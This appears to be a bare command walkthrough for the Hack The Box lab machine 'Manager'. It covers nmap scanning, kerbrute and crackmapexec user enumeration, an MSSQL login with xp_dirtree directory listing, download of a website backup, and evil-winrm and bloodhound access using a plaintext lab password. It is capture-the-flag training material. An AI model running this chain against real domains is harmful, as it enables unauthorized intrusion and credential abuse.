echo "10.129.76.0 manager.htb" | sudo tee -a /etc/hosts

nmap -sC manager.htb

kerbrute userenum -d manager.htb --dc 10.129.76.0 /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
crackmapexec smb manager.htb -u 'anonymous' -p '' --rid-brute

Userlist found!

impacket-mssqlclient -p 1433 -windows-auth -dc-ip 10.129.76.0 "manager.htb/Operator:operator"@10.129.76.0

exec master.sys.xp_dirtree 'C:\Inetpub\wwwroot',1,1;

wget http://manager.htb/website-backup-27-07-23-old.zip

evil-winrm -i manager.htb -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123'

bloodhound -d manager.htb -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -gc dc01.manager.htb -c all -ns 10.10.14.66